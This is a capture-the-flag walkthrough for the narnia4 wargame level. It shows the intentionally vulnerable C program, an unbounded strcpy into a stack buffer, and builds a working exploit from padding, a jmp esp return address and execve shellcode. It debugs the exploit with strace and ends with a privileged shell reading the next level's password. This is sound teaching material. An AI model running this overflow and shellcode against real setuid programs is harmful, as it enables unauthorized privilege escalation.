#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

/* glibc's environment table; the loop below walks it until the NULL terminator. */
extern char **environ;

/*
 * narnia4 challenge binary (intentionally vulnerable; left unchanged so the
 * exploit below matches it).
 *
 * Behaviour visible here:
 *  - every environment string is zeroed in place with memset(); only the
 *    string contents are wiped, the environ[] pointers themselves remain.
 *    Shellcode therefore cannot be staged in an environment variable, the
 *    way it could in earlier levels: the payload has to live in argv[1].
 *  - argv[1] is then copied into a fixed 256-byte stack buffer with an
 *    unbounded strcpy(). argc is checked, the length of argv[1] is not, so
 *    an argument longer than the buffer overwrites whatever sits above
 *    `buffer` in the frame, including the saved return address.
 *
 * Returns 0 on every path; the program has no other output or side effect.
 * (stdlib.h, stdio.h and ctype.h are included but nothing from them is used
 * in the visible code.)
 */
int main(int argc,char **argv){
    int i;
    char buffer[256];   /* destination of the unbounded copy below */

    /* Wipe the contents of each environment string; argv is not touched. */
    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    /* The vulnerable call: no bound on the copy, no check on strlen(argv[1]). */
    if(argc>1)
        strcpy(buffer,argv[1]);

    return 0;
}
It looks like the basic stack overflow of level2, just with a larger buffer, but before the vulnerable strcpy() the executable zeroes every environment string. That rules out staging the shellcode in an environment variable (the strings are wiped before the overflow happens), so the whole payload — padding, return address and shellcode — has to be passed in argv[1].
Let's try the JMP ESP technique with the same gadget address used in level2. The overwritten return address points at a `jmp esp`; once `ret` has popped it, ESP points to the bytes immediately after it on the stack, so the shellcode is placed right behind the address in the payload. This avoids guessing an absolute stack address — only the gadget address has to be stable, which reusing the level2 value assumes (i.e. the mapping it lives in is not randomised):
narnia4@narnia:~$ strace /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') execve("/narnia/narnia4", ["/narnia/narnia4", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 17 vars */]) = 0 strace: [ Process PID=8400 runs in 32 bit mode. ] brk(NULL) = 0x804a000 ... execve("/bin//sh", ["/bin//sh"], [/* 6 vars */]) = -1 EFAULT (Bad address) --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xfffffff2} --- +++ killed by SIGSEGV +++ Segmentation fault
The execve() reaches the kernel but fails with EFAULT (a bad pointer in one of its arguments). So why don't we use the same shellcode that worked for level1?
It is a shellcode of the same length (23 bytes), but after building "/bin//sh" on the stack and loading its address into ebx it copies the zeroed eax into both ecx and edx (`89 c1`, `89 c2`), so execve() is called with argv = NULL and envp = NULL. The variant above instead builds a one-entry argv in ecx (`50 53 89 e1`) and never touches edx, so envp is whatever edx happened to hold when the shellcode ran — that is the bad pointer behind the EFAULT:
narnia4@narnia:~$ strace /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"') execve("/narnia/narnia4", ["/narnia/narnia4", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...], [/* 17 vars */]) = 0 strace: [ Process PID=8441 runs in 32 bit mode. ] brk(NULL) = 0x804a000 fcntl64(0, F_GETFD) = 0 fcntl64(1, F_GETFD) = 0 fcntl64(2, F_GETFD) = 0 .... write(2, "$ ", 2$ ) = 2 read(0,
So it is working: the shell is executed, prints its prompt (the `write(2, "$ ", 2)`) and then blocks waiting for input in `read(0, ...`.
Now run it without strace to get the privileged shell. Note that a setuid binary executed under ptrace does not gain its owner's privileges, so the traced shell above would only have been narnia4's; the euid=narnia5 below is only visible without the tracer:
narnia4@narnia:~$ /narnia/narnia4 $(python -c 'print "A"*264 + "\x97\x4f\xfc\xf7" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"') $ id uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14004(narnia4) $ cat /etc/narnia_pass/narnia5 f*******y
$